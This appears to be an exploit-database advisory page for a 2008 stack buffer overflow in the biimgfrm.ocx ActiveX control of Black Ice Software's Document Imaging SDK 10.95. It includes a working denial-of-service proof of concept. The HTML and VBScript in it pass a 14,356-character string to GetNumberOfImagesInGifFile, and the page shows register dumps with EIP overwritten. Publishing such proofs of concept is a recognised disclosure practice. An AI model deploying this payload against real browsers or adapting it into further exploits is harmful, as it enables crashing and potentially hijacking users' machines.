Document Imaging SDK Buffer Overflow Vulnerability

vendor:

Document Imaging SDK

by:

r0ut3r

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Document Imaging SDK

Affected Version From: 10.95

Affected Version To: 10.95

Patch Exists: NO

Related CWE: N/A

CPE: a:black_ice_software:document_imaging_sdk

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Pro SP2

2008

Document Imaging SDK Buffer Overflow Vulnerability

A buffer overflow vulnerability exists in Black Ice Software's Document Imaging SDK 10.95. By supplying a specially crafted argument to the GetNumberOfImagesInGifFile method of the biimgfrm.ocx ActiveX control, an attacker can cause a stack-based buffer overflow, resulting in a denial of service condition. The CLSID of the vulnerable ActiveX control is {79956462-F148-497F-B247-DF35A095F80B}. The vulnerable ActiveX control is marked as safe for scripting and initialization, and the kill bit is not set.

Mitigation:

No known mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

<!--
Document Imaging SDK Buffer Overflow Vulnerability

               DoS Proof of concept

Author: r0ut3r
Mail  : writ3r [at] gmail.com
-----------------------------
-Tested on WinXP Pro SP2

Version: 10.95


Vendor : Black Ice Software

Price  : $999

File : biimgfrm.ocx
CLSID: {79956462-F148-497F-B247-DF35A095F80B}

DLL Settings: 
RegKey Safe for Script: True
RegKey Safe for Init  : True
KillBitSet            : False

Register: 



EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 00150168 -> 00000000
EDI 41414141



ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013EA20 -> 0013EAA4
ESP 0013E804 -> 0000021A
-----------------------------
-->
<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>



<script language='vbscript'>
 Sub Boom
    buff = String(14356, "A")
    test.GetNumberOfImagesInGifFile buff

 End Sub
</script>
<input type=button onclick=Boom() value='Boom?'>

# milw0rm.com [2008-07-15]